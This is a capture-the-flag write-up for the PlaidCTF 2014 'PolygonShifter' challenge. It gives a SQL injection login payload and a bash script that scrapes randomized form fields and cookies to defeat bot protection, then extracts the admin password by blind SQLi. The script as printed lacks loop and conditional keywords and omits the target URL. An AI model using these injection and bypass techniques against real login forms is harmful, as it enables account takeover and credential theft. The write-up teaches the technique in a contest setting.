PlaidCTF 2014 – PolygonShifter [100]

For PlaidCTF2014, Eindbazen and fail0verflow joined forces as 0xffa, the Final Fail Alliance. Don’t miss out on other write-ups at fail0verflow’s site!

The Plague has purchased the newest invention, Polygon Shifter to protect his website. This cutting edge technology is made available by Polygon Security, and they have a demo page on their website. They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?

On the Polygonshift website is a live demo form where you can login as user test/test or as user admin/?????. After logging in as user admin with password: a’ OR 1=1 and username=’admin’# we get the message
Hello, admin!! My password is the flag!
. So, we have a blind SQLi and the goal is to get the password of the admin user.

To script this we have to bypass the bot protection. Every request to the form has unique form field names and a matching cookie.

<h4>A friendly login form; not so friendly for bots!</h4>
<form action="/G41gTTKfUfNlvgUkvcBW" method="POST">
<label style="text-align: left;" for="">Username</label>
<input id="G7sThpMrQ517uxcJk5q6" type="text" name="Xxx6r5iMzsKSJT9xtX5Z" />
<label style="text-align: left;" for="RS2Lee7dOl5yYzI8htZH">Password</label>
<input id="RS2Lee7dOl5yYzI8htZH" type="password" name="NUTdgpo6iUOxseiiKJLV" />
<input type="submit" value="Login" />

So for every try we should first get the form field names and cookie, which we can use in the evil payload in our second request. For a successful login we get the admin message, for an unsuccesful login we get ‘Wrong credentials’.

That all combined in this bash script will give us the password of the admin user.


for i in `seq 32`
    for j in _ {0..9} {a..z}
	# Get form field names and cookie
	curl -sc cookie > poly.in

	ACTION=$(cat poly.in | egrep -o '<form action="/[^"]*" method="POST">' | egrep -o '/[^"]*')
	NAME=$(cat poly.in | egrep -o '<input type="text" id="[^"]*" name="[^"]*">' | sed -e 's/.*name="//' -e 's/">//')
	PASSWORD=$(cat poly.in | egrep -o '<input type="password" id="[^"]*" name="[^"]*">' | sed -e 's/.*name="//' -e 's/">//')

        # Send our evil payload
	STRING="a' OR 1=(SELECT CASE WHEN (SELECT(SUBSTR(password,${i},1))='${j}') THEN 1 ELSE 2 END); AND username='admin'#"

	curl -sb cookie -d "${NAME}=admin&${PASSWORD}=${STRING}"${ACTION} > poly.out

	cat poly.out | grep h4 | grep 'admin' > /dev/null 2>&1
	if [ $? -eq 0 ]
		echo -n "$j"

echo ""

Password/flag: n0b0t5_c4n_bypa5s_p0lym0rph1sm

Comments are closed.